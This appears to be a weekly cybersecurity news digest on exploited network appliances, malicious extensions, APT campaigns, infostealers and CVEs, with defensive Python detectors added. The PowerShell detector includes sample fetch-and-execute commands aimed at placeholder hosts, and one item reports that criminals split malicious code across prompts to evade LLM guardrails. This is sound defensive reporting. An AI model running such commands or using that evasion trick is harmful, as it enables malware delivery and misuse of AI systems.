
Last week's threats showed that attackers no longer need a big hack to cause big damage. They are going after the everyday tools we trust most, firewalls, browser add-ons, even smart TVs, and turning small cracks into serious breaches.
The real danger now is not one major attack but hundreds of quiet ones that ride on the software and devices already inside our networks. Any trusted system becomes an entry point if it is left unpatched or overlooked.
Here is a clear look at the week's biggest risks, from exploited network flaws to new global campaigns and fast-moving vulnerabilities.
⚡ Threat of the Week
Flaws in Multiple Network Security Products Come Under Attack — Over the past week, Fortinet, SonicWall, Cisco, and WatchGuard said vulnerabilities in their products have been exploited by threat actors in real-world attacks. Cisco said CVE-2025-20393, a critical flaw in AsyncOS, has been abused by a China-nexus advanced persistent threat (APT) actor codenamed UAT-9686 to deliver malware such as ReverseSSH (aka AquaTunnel), Chisel, AquaPurge, and AquaShell. The flaw remains unpatched. SonicWall said attacks exploiting CVE-2025-40602, a local privilege escalation flaw impacting Secure Mobile Access (SMA) 100 series appliances, have been observed in connection with CVE-2025-23006 (CVSS score 9.8) to achieve unauthenticated remote code execution with root privileges. The development comes as firewalls and edge appliances have become a favorite target, since a foothold on one of them gives attackers deep visibility into traffic, VPN connections, and downstream systems.
🔔 Top News
Featured Chrome Extension Caught Harvesting AI Chats — Urban VPN Proxy, a Google Chrome and Microsoft Edge extension with more than 7.3 million installations, was observed stealthily gathering every prompt entered by users into artificial intelligence (AI)-powered chatbots like OpenAI ChatGPT, Anthropic Claude, Microsoft Copilot, DeepSeek, Google Gemini, xAI Grok, Meta AI, and Perplexity. Three other extensions from the same developer, 1ClickVPN Proxy, Urban Browser Guard, and Urban Ad Blocker, were also updated with similar functionality. Collectively, these add-ons were installed more than eight million times. The extensions are no longer available for download from the Chrome Web Store.
Ink Dragon Targets Governments with ShadowPad and FINALDRAFT — The threat actor known as Jewelbug (CL-STA-0049, Earth Alux, Ink Dragon, and REF7707) has been increasingly focusing on government targets in Europe since July 2025, even as it continues to attack entities located in Southeast Asia and South America. The campaign has “impacted several dozen victims, including government entities and telecommunications organizations, across Europe, Asia, and Africa.” Ink Dragon does not merely use victims for data theft but actively repurposes them to support ongoing operations against other targets of interest. This creates a self-sustaining infrastructure that obscures the true origin of the attacks while maximizing the utility of every compromised asset.
Kimwolf Botnet Hijacks 1.8 Million Android TVs — A new botnet named Kimwolf is powered by no less than 1.8 million Android TVs. Infections are scattered globally, with Brazil, India, the U.S., Argentina, South Africa, and the Philippines registering higher concentrations. Kimwolf is believed to share its origins with AISURU, which has been behind some of the record-breaking DDoS attacks over the past year. It’s suspected that the attackers reused code from AISURU in the early stages, before opting to develop the Kimwolf botnet to evade detection. QiAnXin XLab said it’s possible some of these attacks may not have come from AISURU alone, and that Kimwolf may be either participating or even leading the efforts.
LongNosedGoblin Uses Group Policy For Malware Deployment — A previously undocumented China-aligned threat cluster dubbed LongNosedGoblin has been attributed to a series of cyber attacks targeting governmental entities in Southeast Asia and Japan. Central to the group’s tradecraft is the abuse of Group Policy to deploy malware across the compromised network and cloud services for communication with infected endpoints using a backdoor dubbed NosyDoor. The threat actor is believed to be active since at least September 2023. The exact initial access methods used in the attacks are presently unknown.
Kimsuky Uses DocSwap Android Malware — The North Korean threat actor known as Kimsuky has been linked to a new campaign that distributes a new variant of Android data gathering malware called DocSwap via QR codes hosted on phishing sites mimicking Seoul-based logistics firm CJ Logistics (formerly CJ Korea Express). The apps masquerade as package delivery service apps. It’s believed that the threat actors are using smishing texts or phishing emails impersonating delivery companies to deceive recipients into clicking on booby-trapped URLs hosting the apps. A noteworthy aspect of the attack is its QR code-based mobile redirection, which prompts users visiting the URLs from a desktop computer to scan a QR code displayed on the page on their Android device to install the supposed shipment tracking app and look up the status.
🔥 Trending CVEs
Hackers act fast. They can use new bugs within hours. One missed update can cause a big breach. Here are this week’s most serious security flaws. Check them, fix what matters first, and stay protected.
This week’s list includes — CVE-2025-14733 (WatchGuard), CVE-2025-11901, CVE-2025-14302, CVE-2025-14303, CVE-2025-14304 (pre-boot DMA protection Bypass), CVE-2025-37164 (HPE OneView Software), CVE-2025-59374 (ASUS Live Update), CVE-2025-20393 (Cisco AsyncOS), CVE-2025-40602 (SonicWall SMA 100 Series), CVE-2025-66430 (Plesk), CVE-2025-33213 (NVIDIA Merlin Transformers4Rec for Linux), CVE-2025-33214 (NVIDIA NVTabular for Linux), CVE-2025-54947 (Apache StreamPark), CVE-2025-13780 (pgAdmin), CVE-2025-34352 (JumpCloud Agent), CVE-2025-14265 (ConnectWise ScreenConnect), CVE-2025-40806, CVE-2025-40807 (Siemens Gridscale X Prepay), CVE-2025-32210 (NVIDIA Isaac Lab), CVE-2025-64374 (Motors WordPress theme), CVE-2025-64669 (Microsoft Windows Admin Center), CVE-2025-46295 (Apache Commons Text), CVE-2025-68154 (systeminformation), CVE-2025-14558 (FreeBSD), and cross-site scripting and information disclosure flaws in Roundcube Webmail (no CVEs).
📰 Around the Cyber World
FBI Warns of Campaigns Impersonating Government Officials — The U.S. Federal Bureau of Investigation (FBI) has warned that malicious actors have impersonated senior U.S. state government, White House, and Cabinet-level officials, as well as members of Congress, to target individuals, including officials’ family members and personal acquaintances, since at least 2023. “Malicious actors have sent text messages and AI-generated voice messages — techniques known as smishing and vishing, respectively — that claim to come from a senior U.S. official to establish rapport with targeted individuals,” the FBI said. “In the scheme, actors contact an individual and briefly engage on a topic the victim is versed on, with a request to move communication to a secondary, encrypted mobile messaging application, happening almost immediately.” Once the conversation has shifted to Signal or WhatsApp, the threat actors urge victims to provide an authentication code that allows the actors to sync their device with the victim’s contact list, share Personally Identifiable Information (PII) and copies of sensitive personal documents, wire funds to an overseas financial institution under false pretenses, and introduce the actor to a known associate.
Noyb Files Complaint Against TikTok, AppsFlyer and Grindr — Austrian privacy non-profit noyb has filed complaints against TikTok, AppsFlyer, and Grindr, accusing the popular video sharing platform of unlawfully tracking users across apps in violation of GDPR laws in the region. “A user found out about this unlawful tracking practice through an access request — which showed that, e.g. his usage of Grindr was sent to TikTok, likely via the Israeli tracking company AppsFlyer — which allows TikTok to draw conclusions about his sexual orientation and sex life,” noyb said. “TikTok initially even withheld this information from the user, which violates Article 15 GDPR. Only after repeated inquiries, TikTok revealed that it knows which apps he used, what he did within these apps (for example, adding a product to the shopping cart) – and that this data also included information about his usage of the gay dating app Grindr.”
AuraStealer Spotted in the Wild — An emerging malware-as-a-service (MaaS) information stealer called AuraStealer has been distributed via Scam-Yourself campaigns, where victims are lured by TikTok videos disguised as product activation guides. “Viewers are instructed to manually retype and run a displayed command in an administrative PowerShell, which, however, instead of activating the software, quietly downloads and executes the malicious payload,” Gen Digital said. “Apart from TikTok Scam-Yourself campaigns, AuraStealer is also distributed through supposedly cracked games or software, with delivery chains of varying complexity.” AuraStealer makes use of a long list of anti-analysis and obfuscation techniques, including indirect control flow obfuscation, string encryption, and exception-driven API hashing, to resist attempts to reverse engineer the malware. It’s capable of harvesting data from Chromium- and Gecko-based browsers, cryptocurrency wallets from desktop applications and browser extensions, clipboard contents, session tokens, credentials, VPNs, password managers, screenshots, and detailed system metadata. Also detected in the wild are two other information stealers named Stealka and Phantom, with the latter distributed via fake Adobe installers.
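A defender's first question about a Scam-Yourself lure is how to spot the retyped command after the fact. The following Python, added here as an example and not part of Gen Digital's analysis, triages constructed PowerShell script block entries (the kind Script Block Logging records as Event ID 4104) and scores the download-and-execute shape those lures take: fetch remote content, pipe it into an evaluator, run elevated. The log entries, indicator names, and scoring weights are assumptions for illustration.

```python
import re

# Constructed script block entries for the example; none are taken from the
# AuraStealer campaign. "elevated" stands in for the host process' integrity level.
SAMPLE_SCRIPT_BLOCKS = [
    {"id": 1, "elevated": True,  "text": "irm https://example.invalid/activate | iex"},
    {"id": 2, "elevated": True,  "text": "iex ((New-Object Net.WebClient).DownloadString('http://198.51.100.20/a.ps1'))"},
    {"id": 3, "elevated": False, "text": "Get-ChildItem C:\\Users\\me\\Documents | Measure-Object"},
    {"id": 4, "elevated": True,  "text": "Set-ExecutionPolicy RemoteSigned -Scope CurrentUser"},
    {"id": 5, "elevated": False, "text": "Invoke-WebRequest https://example.org/report.csv -OutFile report.csv"},
]

# Indicator patterns (assumed set): each one alone is common in admin work; the
# combination of a remote fetch and a string evaluator is what the lure relies on.
INDICATORS = {
    "remote_fetch": re.compile(
        r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile|Start-BitsTransfer)\b",
        re.I),
    "exec_string": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "encoded":     re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.I),
    "hidden":      re.compile(r"-(?:w|win|windowstyle)\s+hidden\b", re.I),
    "url":         re.compile(r"https?://", re.I),
}


def score_block(block):
    """Return (score, matched indicator names) for one script block entry."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(block["text"])]
    score = len(hits)
    # Fetch-then-evaluate is the defining shape of a "type this command" lure,
    # so weight the pair far above either indicator on its own.
    if "remote_fetch" in hits and "exec_string" in hits:
        score += 3
    if block["elevated"]:
        score += 1
    return score, hits


def triage(blocks, threshold=4):
    """Return the entries whose score reaches the (assumed) alerting threshold."""
    results = []
    for block in blocks:
        score, hits = score_block(block)
        if score >= threshold:
            results.append({"id": block["id"], "score": score, "indicators": hits})
    return results


if __name__ == "__main__":
    for hit in triage(SAMPLE_SCRIPT_BLOCKS):
        print(hit)
```

Entries 1 and 2 cross the threshold on the fetch-plus-evaluate combination; the plain Invoke-WebRequest download in entry 5 scores low because nothing evaluates what it fetched, which is the distinction a tuned rule needs to keep false positives down in an administrator-heavy environment.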
Blind Eagle Continues to Attack Colombia — Colombian institutions have continued to face attacks from a threat actor known as Blind Eagle. The latest phishing attacks, targeting agencies under the Ministry of Commerce, Industry and Tourism (MCIT), have shifted to a more sophisticated, multi-layer flow that uses an off-the-shelf loader named Caminho to deliver DCRat. The messages are sent from compromised email accounts within the same organization to bypass security checks. “The phishing email used a legal-themed design to lure the recipient,” Zscaler said. “The email was created to appear as an official message from the Colombian judicial system, referencing a labor lawsuit with an authentic-sounding case number and date. The email pressures the recipient to confirm receipt immediately, leveraging authority, fear of legal consequences, and confidentiality warnings to trick the recipient into taking an action, namely opening the attachment.”

Scripted Sparrow Linked to Large-Scale BEC Attacks — A sprawling Business Email Compromise (BEC) collective known as Scripted Sparrow has been observed distributing more than three million email messages each month and refining its social-engineering playbook. “The scale of the group’s operation strongly suggests the use of automation to generate and send their attack messages,” Fortra said. “The group utilizes a combination of free webmail addresses as well as addresses on domains they’ve registered specifically for their operations. The group operates by posing as various executive coaching and leadership training consultancies.” The group is estimated to have registered 119 domains and used 245 webmail addresses. It has also used 256 bank accounts to move money out of victims’ bank accounts.
Smart Devices Run Outdated Browser Versions — An academic study by a team of Belgian researchers has found that a majority of smart devices, such as smart TVs, e-readers, and gaming consoles, come with an embedded web browser that runs extremely outdated versions, sometimes as much as three years. All five e-readers that were tested, and 24 of 35 smart TV models, used embedded browsers that were at least three years behind current versions available to users of desktop computers. These outdated, embedded browsers can leave users open to phishing and other security vulnerabilities. The authors said some of the issues lie in how development frameworks like Electron bundle browsers with other components. “We suspect that, for some products, this issue stems from the user-facing embedded browser being integrated with other UI components, making updates challenging – especially when bundled in frameworks like Electron, where updating the browser requires updating the entire framework,” they said in the paper. “This can break dependencies and increase development costs.”
Denmark Blames Russia For Attack on Water Utility — The Danish Defence Intelligence Service (DDIS) has blamed Russia for recent destructive and disruptive cyber attacks against the country, including a water utility in 2024, as well as distributed denial-of-service (DDoS) attacks on Danish websites in the run-up to the 2025 municipal and regional council elections. The attacks have been attributed to pro-Russian hacktivist groups Z-Pentest and NoName057(16), respectively. “The Russian state uses both groups as instruments of its hybrid war against the West. The aim is to create insecurity in the targeted countries and to punish those who support Ukraine,” the DDIS said. “Russia’s cyber operations form part of a broader influence campaign intended to undermine Western support for Ukraine.” The statement comes a few days after a global cybersecurity advisory warned that pro-Russian hacktivist groups conduct opportunistic attacks against US and global critical infrastructure.
Russia Targeted by Arcane Werewolf — Russian manufacturing companies have become the target of a threat actor known as Arcane Werewolf (aka Mythic Likho). Campaigns undertaken by the hacking group in October and November 2025 likely leveraged phishing emails as the initial access vector that presumably contained links to a malicious archive hosted on the attackers’ server. The links directed victims to a spoofed website imitating a Russian manufacturing company. The end goal of the attacks is to deploy a custom implant named Loki 2.1 by means of a loader that’s delivered using a Go-based dropper downloaded from an external server using PowerShell code embedded into a Windows shortcut (LNK) contained in the ZIP file. In an attack chain detected in November 2025, a new C++ dropper was used to propagate the malware. Loki 2.1 is equipped to upload/download files, inject code into a target process, terminate arbitrary processes, retrieve environment variables, and stop its own execution.
RansomHouse Upgrades to Complex Encryption — The RansomHouse (aka Jolly Scorpius) ransomware group has upgraded its file encryption process to use two different encryption keys to encrypt files as part of their attacks in what has been described as a significant escalation and “concerning trajectory” in ransomware development. “The upgraded version’s code reveals a two-factor encryption scheme where the file is encrypted with both a primary key and a secondary key. Data encryption is processed separately for each key,” Palo Alto Networks Unit 42 said. “This significantly increases the difficulty of decrypting the data without both keys.” The e-crime group has been active since December 2021, listing 123 victims on its data leak site. Central to the threat actor’s operations is a tool called MrAgent that provides attackers with persistent access to a victim’s environment and simplifies managing compromised hosts at scale. It’s also responsible for deploying Mario to encrypt critical VM files in the ESXi hypervisor.
LLMs and Ransomware Lifecycle — The emergence of large language models (LLMs) is likely accelerating the ransomware lifecycle, according to new findings from SentinelOne. “We observe measurable gains in speed, volume, and multilingual reach across reconnaissance, phishing, tooling assistance, data triage, and negotiation, but no step-change in novel tactics or techniques driven purely by AI at scale,” the company said. LLMs, including those that are deployed locally, can be used to replace the manual effort associated with drafting phishing emails and localized content, search for sensitive data, and develop malicious code. The continued sightings of various dark LLMs show that criminals are gravitating toward uncensored models that allow them to evade guardrails. “Actors already chunk malicious code into benign prompts across multiple models or sessions, then assemble offline to dodge guardrails,” SentinelOne said. “This workflow will become commoditized as tutorials and tooling proliferate, ultimately maturing into ‘prompt smuggling as a service.'” The findings signal that the barrier to entry into cybercrime continues to drop, even as the ransomware ecosystem is splintering and the line between nation-state and crimeware activity is increasingly blurring. The technology is also likely to blur existing assessment lines around tradecraft and attribution, because it lets smaller groups acquire capabilities that were once limited to advanced state-backed actors.
TikTok Signs Agreement to Create New U.S. Joint Venture — Nearly a year after TikTok’s operations were briefly banned in the U.S. for national security concerns, the popular video-sharing platform said it has finalized a deal to move a substantial portion of its U.S. business under a new joint venture named TikTok USDS Joint Venture LLC. According to reports from Axios, Bloomberg, CNBC, and The Hollywood Reporter, the company has signed agreements with the three managing investors: Oracle, Silver Lake, and Abu Dhabi-based MGX. Together, those companies will own 45% of the U.S. operation, while ByteDance retains a nearly 20% share. The new entity is said to be responsible for protecting U.S. data, ensuring the security of its prized algorithm, content moderation, and “software assurance.” Oracle will be the trusted security partner in charge of auditing and validating compliance. The agreement is set to go into effect on January 22, 2026. Under a national security law, China-based ByteDance was required to divest TikTok’s U.S. operations or face an effective ban in the country. The U.S. government has since extended the ban four times as a deal was being hatched behind the scenes. Under President Donald Trump’s executive order in September, the attorney general was blocked from enforcing the national security law for a 120-day period in order to “permit the contemplated divestiture to be completed,” allowing the deal to finalize by January 23, 2026.
Android Adware Campaign Targets East and Southeast Asia — Android users in the Philippines, Pakistan, and Malaysia have been targeted by a large-scale Android adware campaign dubbed GhostAd that silently drains resources and disrupts normal phone use through persistent background activity. The set of 15 apps, distributed via Google Play, masqueraded as harmless utility and emoji-editing tools such as Vivid Clean and GenMoji Studio. “Behind their cheerful icons, these apps created a persistent background advertising engine – one that kept running even after users closed or rebooted their devices, quietly consuming battery and mobile data,” Check Point said. “GhostAd integrates multiple legitimate advertising software development kits (SDKs), including Pangle, Vungle, MBridge, AppLovin, and BIGO, but uses them in a way that violates fair-use policies. Instead of waiting for user interaction, the apps continuously load, queue, and refresh ads in the background, using Kotlin coroutines to sustain the cycle.” The apps have since been removed by Google, but not before they amassed millions of downloads.
Texas Sues TV Makers for Spying on Owners — Texas Attorney General Ken Paxton accused Sony, Samsung, LG, Hisense, and TCL of spying on their customers and illegally collecting their data by using automatic content recognition (ACR), according to a new lawsuit. “ACR in its simplest terms is an uninvited, invisible digital invader,” Paxton said. “This software can capture screenshots of a user’s television display every 500 milliseconds, monitor viewing activity in real time, and transmit that information back to the company without the user’s knowledge or consent. This conduct is invasive, deceptive, and unlawful.”
Cybercriminals Entice Insiders with High Payouts — Check Point has called attention to dark web posts that aim to recruit insiders within organizations to gain access to corporate networks, user devices, and cloud environments. The activity targets the financial sector and cryptocurrency firms, as well as companies like Accenture, Genpact, Netflix, and Spotify. The ads offer payouts from $3,000 to $15,000 for access or data. “Across darknet forums, employees are being approached, or even volunteering, to sell access or sensitive information for lucrative rewards,” the company said. “When internal staff disable defenses, leak credentials, or provide privileged information, preventing an attack becomes exponentially harder. Monitoring the deep web and darknet for organizational mentions or stolen data is now as critical as deploying advanced cyber prevention technologies.”
Flaws in Anno 1404 Game — Synacktiv researchers have disclosed multiple vulnerabilities in a strategy game named Anno 1404 that, if chained together, allow for arbitrary code execution from within the multiplayer mode.
JSCEAL Campaign Undergoes a Shift — A Facebook ads campaign that’s used to distribute a compiled V8 JavaScript (JSC) malware called JSCEAL has evolved into a more sophisticated form, with the attackers adopting a revamped command-and-control (C2) infrastructure, enhanced anti-analysis safeguards, and an updated script engine designed for increased stealth. “In contrast to the 1H 2025 campaign, which relied primarily on .com domains, the August 2025 campaign includes a broader variety of top-level domains such as .org, .link, .net, and others,” Cato Networks said. “These domains are registered in bulk at regular intervals, suggesting an automated, scalable provisioning workflow.” What’s more, the updated infrastructure enforces stricter filtering and anti-analysis controls, blocking any HTTP request that does not present a PowerShell User-Agent. In the event a request includes the correct PowerShell User-Agent, the server responds with a fake PDF error rather than delivering the actual payload. It’s only after the PDF has been returned that the C2 server delivers the next stage, including a modified version of the ZIP file containing the stealer malware.
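The User-Agent gate and the PDF-then-ZIP ordering described above are visible from the proxy's side, which makes them usable as a detection. The following Python is an added example rather than code from Cato Networks: it walks constructed proxy log lines and flags a client that, while presenting a PowerShell User-Agent, was served a PDF and then a ZIP from the same host, noting whether that host also turned away a browser User-Agent. The log format, host names, User-Agent strings, and content-type list are assumptions for illustration.

```python
import re
from collections import defaultdict

# Constructed proxy log lines for the example (hosts and addresses are reserved
# example ranges, not JSCEAL infrastructure).
# Fields: timestamp, client IP, method, URL, "User-Agent", status, content-type, bytes
SAMPLE_LOG = """\
2025-08-12T09:14:01Z 10.0.0.12 GET https://example-cdn.link/update "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/127.0" 403 text/html 0
2025-08-12T09:14:05Z 10.0.0.12 GET https://example-cdn.link/update "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.4894" 200 application/pdf 5120
2025-08-12T09:14:09Z 10.0.0.12 GET https://example-cdn.link/update "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.4894" 200 application/zip 2048000
2025-08-12T09:20:00Z 10.0.0.33 GET https://intranet.example.org/report.pdf "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/127.0" 200 application/pdf 77000
2025-08-12T09:21:00Z 10.0.0.41 GET https://packages.example.org/tool.zip "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.4894" 200 application/zip 900000
"""

LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>\S+) (?P<url>\S+) "(?P<ua>[^"]*)" '
    r'(?P<status>\d{3}) (?P<ctype>\S+) (?P<bytes>\d+)$'
)
HOST_RE = re.compile(r'^https?://([^/]+)')
POWERSHELL_UA = re.compile(r'WindowsPowerShell/|PowerShell/')
# Content types that stand in for "the real payload" in this example.
PAYLOAD_TYPES = ('application/zip', 'application/octet-stream')


def parse_log(text):
    """Parse the assumed log format into dicts; malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        row = m.groupdict()
        row['host'] = HOST_RE.match(row['url']).group(1)
        row['status'] = int(row['status'])
        row['ps'] = bool(POWERSHELL_UA.search(row['ua']))
        rows.append(row)
    return rows


def find_staged_downloads(rows):
    """Flag (client, host) pairs where a PowerShell client got a PDF and later a
    payload-type response; record whether the host also refused a browser UA."""
    seq = defaultdict(list)      # (src, host) -> [(ts, status, ctype)] for PowerShell UAs
    browser_blocked = set()      # hosts that answered a non-PowerShell UA with 403/404
    for r in rows:
        if r['ps']:
            seq[(r['src'], r['host'])].append((r['ts'], r['status'], r['ctype']))
        elif r['status'] in (403, 404):
            browser_blocked.add(r['host'])

    findings = []
    for (src, host), events in seq.items():
        events.sort()            # ISO-8601 timestamps sort lexically
        saw_pdf = False
        for _, status, ctype in events:
            if status != 200:
                continue
            if ctype == 'application/pdf':
                saw_pdf = True
            elif saw_pdf and ctype in PAYLOAD_TYPES:
                findings.append({'src': src, 'host': host,
                                 'ua_gated': host in browser_blocked})
                break
    return findings


if __name__ == '__main__':
    for f in find_staged_downloads(parse_log(SAMPLE_LOG)):
        print(f)
```

Only the 10.0.0.12 session is reported: it shows the full sequence (browser request refused, PowerShell request answered with a PDF, then a ZIP). The standalone PowerShell ZIP download from 10.0.0.41 and the browser's PDF download from 10.0.0.33 do not match, which keeps ordinary scripted package fetches out of the alert.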
Third Defendant Pleads Guilty to Hacking Fantasy Sports and Betting Website — Nathan Austad, 21, of Farmington, Minnesota, has pleaded guilty in connection with a scheme to hack thousands of user accounts at an unnamed fantasy sports and betting website and sell access to those accounts with the goal of stealing hundreds of thousands of dollars from users. Austad and others launched a credential stuffing attack on the website in November 2022 and fully compromised approximately 60,000 user accounts. “In some instances, Austad and his co-conspirators were able to add a new payment method of their own on the account (i.e., to a newly added financial account belonging to the hacker) and then use it to withdraw all the existing funds in the victim account to themselves, thus stealing the funds in each affected Victim Account,” the U.S. Justice Department said. “Using this method, Austad and others stole approximately $600,000 from approximately 1,600 victim accounts on the Betting Website.” Access to the victim accounts was then sold on various websites that traffic in stolen accounts.
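The two behaviours in the case above, a burst of logins against many different accounts from one source and a payment-method change followed by a withdrawal on a freshly compromised account, are both detectable in application logs. The following Python is an added example, not the betting site's or the Justice Department's own tooling; it builds a constructed event log and implements both checks, using the first to feed the second. Thresholds, field layout, and event names are assumptions for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

FMT = '%Y-%m-%dT%H:%M:%SZ'


def build_sample_log():
    """Constructed event log (not data from the actual case).
    Fields: timestamp, source IP, username, event, outcome."""
    lines = []
    base = datetime(2022, 11, 3, 2, 0, 0)
    # Stuffing burst: one IP tries 40 different usernames in two minutes; two succeed.
    for i in range(40):
        ts = (base + timedelta(seconds=3 * i)).strftime(FMT)
        user = f'user{i:03d}'
        outcome = 'OK' if user in ('user007', 'user021') else 'FAIL'
        lines.append(f'{ts} 203.0.113.9 {user} login {outcome}')
    # Cash-out on user021: new payment method added, funds withdrawn minutes later.
    lines.append(f"{(base + timedelta(minutes=5)).strftime(FMT)} 203.0.113.9 user021 payment_method_add OK")
    lines.append(f"{(base + timedelta(minutes=6)).strftime(FMT)} 203.0.113.9 user021 withdraw OK")
    # Benign user: two typos, then success from a home IP, then a legitimate withdrawal.
    for i, outcome in enumerate(('FAIL', 'FAIL', 'OK')):
        ts = (base + timedelta(minutes=30, seconds=20 * i)).strftime(FMT)
        lines.append(f'{ts} 198.51.100.7 dave login {outcome}')
    lines.append(f"{(base + timedelta(minutes=32)).strftime(FMT)} 198.51.100.7 dave withdraw OK")
    return '\n'.join(lines)


def parse_events(text):
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, ip, user, event, outcome = parts
        events.append({'ts': datetime.strptime(ts, FMT), 'ip': ip,
                       'user': user, 'event': event, 'outcome': outcome})
    events.sort(key=lambda e: e['ts'])
    return events


def detect_stuffing(events, window=timedelta(minutes=10), min_users=20, max_success_ratio=0.25):
    """Flag source IPs that attempt logins for many distinct usernames inside
    `window` with a low success ratio: the signature of a credential-stuffing run."""
    by_ip = defaultdict(list)
    for e in events:
        if e['event'] == 'login':
            by_ip[e['ip']].append(e)
    flagged = {}
    for ip, attempts in by_ip.items():
        start = 0
        for end in range(len(attempts)):            # sliding time window
            while attempts[end]['ts'] - attempts[start]['ts'] > window:
                start += 1
            win = attempts[start:end + 1]
            users = {a['user'] for a in win}
            successes = sum(1 for a in win if a['outcome'] == 'OK')
            if len(users) >= min_users and successes / len(win) <= max_success_ratio:
                flagged[ip] = {'attempts': len(win), 'distinct_users': len(users),
                               'successes': successes}
                break
    return flagged


def detect_takeover(events, flagged_ips, window=timedelta(minutes=30)):
    """For logins that succeeded from a flagged IP, look for the cash-out
    sequence: a new payment method added, then a withdrawal, within `window`."""
    hits = []
    for i, e in enumerate(events):
        if e['event'] != 'login' or e['outcome'] != 'OK' or e['ip'] not in flagged_ips:
            continue
        deadline = e['ts'] + window
        added = False
        for f in events[i + 1:]:
            if f['ts'] > deadline:
                break
            if f['user'] != e['user'] or f['outcome'] != 'OK':
                continue
            if f['event'] == 'payment_method_add':
                added = True
            elif f['event'] == 'withdraw' and added:
                hits.append({'user': e['user'], 'ip': e['ip'],
                             'login': e['ts'], 'withdraw': f['ts']})
                break
    return hits


if __name__ == '__main__':
    evs = parse_events(build_sample_log())
    stuffing = detect_stuffing(evs)
    print(stuffing)
    print(detect_takeover(evs, set(stuffing)))
```

The first check keys on breadth (many usernames) rather than depth (many attempts on one account), which is what separates stuffing from a brute-force on a single user; the second only looks behind successes from already-flagged sources, so dave's own withdrawal from his home address is never considered.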
Drop in Critical CVEs in 2025 — The number of critical vulnerabilities flagged in 2025 is at 3,753, down from 4,629 in 2023 and 4,283 in 2024, even as the total number of CVEs has increased to more than 40,000. According to VulnCheck, about 25.9% of the 43,002 CVEs published in 2025 have been enriched with a CVSS v4 score. “What this ultimately suggests is that CVSS v4 adoption is constrained not by lack of availability, but by limited participation from some of the largest and most influential CVE publishers and enrichers,” it said. “Commonly cited reasons include resource constraints, required tooling changes, and a perception that CVSS v4 provides limited additional value while increasing scoring complexity and operational overhead.”

Amadey Uses Self-Hosted GitLab Instance to Distribute StealC — A new Amadey malware loader campaign has leveraged an exploited self-hosted GitLab instance (“gitlab.bzctoons[.]net”) to deliver the StealC infostealer. “This analysis reveals how threat actors are hijacking abandoned, self-hosted GitLab servers to create a legitimate-looking payload distribution infrastructure,” Trellix said. “The use of a long-standing domain with valid TLS certificates provides an effective evasion technique against traditional security controls.” While the domain appears to belong to a small-scale organization hosting GitLab with multiple users, evidence suggests that either the user account or the entire infrastructure has been compromised.
U.S. Dismantles E-Note Cryptocurrency Exchange — U.S. authorities seized the servers and infrastructure of the E-Note cryptocurrency exchange (“e-note.com,” “e-note.ws,” and “jabb.mn”) for allegedly laundering more than $70 million from ransomware attacks and account takeover attacks since 2017. No arrests have been announced. In tandem, authorities have also indicted the site’s operator, a 39-year-old Russian national named Mykhalio Petrovich Chudnovets, who is said to have started offering money laundering services to cybercriminals in 2010. Chudnovets has been charged with one count of conspiracy to launder monetary instruments, which carries a maximum penalty of 20 years in prison. The takedown fits into a broader law enforcement effort aimed at services that let bad actors abuse the financial system and cash out ill-gotten proceeds.
🎥 Cybersecurity Webinars
How Zero Trust and AI Catch Attacks With No Files, No Binaries, and No Indicators — Cyber threats are evolving faster than ever, exploiting trusted tools and fileless techniques that evade traditional defenses. This webinar reveals how Zero Trust and AI-driven protection can uncover unseen attacks, secure developer environments, and redefine proactive cloud security—so you can stay ahead of attackers, not just react to them.
Master Agentic AI Security: Learn to Detect, Audit, and Contain Rogue MCP Servers — AI tools like Copilot and Claude Code help developers move fast, but they can also create big security risks if not managed carefully. Many teams don’t know which AI servers (MCPs) are running, who built them, or what access they have. Some have already been hacked, turning trusted tools into backdoors. This webinar shows how to find hidden AI risks, stop shadow API key problems, and take control before your AI systems create a breach.
🔧 Cybersecurity Tools
Tracecat — An open-source automation platform designed for security and IT teams that need flexible, scalable workflow orchestration. It combines simple YAML-based integration templates with a no-code interface for building workflows, along with built-in lookup tables and case management. Under the hood, workflows are orchestrated using Temporal to support reliability and scale, making Tracecat suitable for both local experimentation and production environments.
Metis — An open-source, AI-powered security code review tool built by Arm’s Product Security Team. It uses large language models to understand code context and logic, helping engineers find subtle security issues that traditional tools often miss. Metis supports multiple languages through plugins, works with different LLM providers, and is designed to reduce review fatigue in large or complex codebases while improving secure coding practices.
Disclaimer: These tools are for learning and research only. They haven’t been fully tested for security. If used the wrong way, they could cause harm. Check the code first, test only in safe places, and follow all rules and laws.
Conclusion
The past week made one point clear: the perimeter is gone, but accountability isn’t. Every device, app, and cloud service now plays a part in defense. Patching fast, verifying what’s running, and questioning defaults are no longer maintenance tasks — they’re survival skills.
As threats grow more adaptive, resilience comes from awareness and speed, not fear. Keep visibility high, treat every update as risk reduction, and remember that most breaches start with something ordinary left unchecked.
